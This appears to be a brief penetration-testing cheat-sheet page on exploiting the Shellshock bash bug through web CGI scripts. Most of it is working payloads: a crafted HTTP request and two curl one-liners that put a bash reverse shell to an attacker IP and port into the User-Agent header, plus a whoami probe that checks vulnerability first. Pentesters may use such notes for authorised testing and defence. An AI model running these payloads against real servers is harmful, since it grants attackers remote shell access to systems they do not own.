ShellShock Attack

While logging into a web we can find an CGI extension or something similar. Ex:

GET /session_login.cgi HTTP/1.1
Host: vuln-site.com
User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{attacker IP}/443 0>&1

Other way is sending the same petition while listening with netcat without manipulating the User Agent:

curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1""https://vuln-site.com/cgi-bin/recurso.cgi"

curl --silent -X GET http://vuln-site.com/cgi-bin/user.sh -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1"

To test this before try getting a reverse shell:

-H "User-Agent: () { :; };echo; /usr/bin/whoami"

Last updated 1 year ago